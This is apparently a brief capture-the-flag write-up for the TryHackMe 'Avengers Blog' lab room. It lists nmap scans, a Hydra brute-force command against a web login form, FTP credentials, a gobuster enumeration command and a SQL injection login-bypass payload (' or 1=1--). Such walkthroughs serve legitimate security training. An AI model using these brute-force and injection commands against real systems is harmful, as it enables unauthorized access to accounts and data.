Avengers Blog

Room Link: https://tryhackme.com/room/avengers

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

No other ports found.

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

Kali

git clone https://github.com/vanhauser-thc/thc-hydra.git
cd thc-hydra/
./configure
make
make install

./hydra -l groot -P /usr/share/wordlists/SecLists/Passwords/darkweb2017-top10000.txt $VICTIM http-post-form "/auth/:username=^USER^&password=^PASS^:F=Incorrect username" -V

Cookies

Get the flag with developer console by checking the cookie.

HTTP Headers

Enumeration and FTP

Kali

ftp $VICTIM
Username: groot
Password: iamgroot

GoBuster

Kali

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

SQL Injection

Username: ' or 1=1--
Password: ' or 1=1--

Remote Code Execution and Linux

PreviousAgent TNextMustacchio

Last updated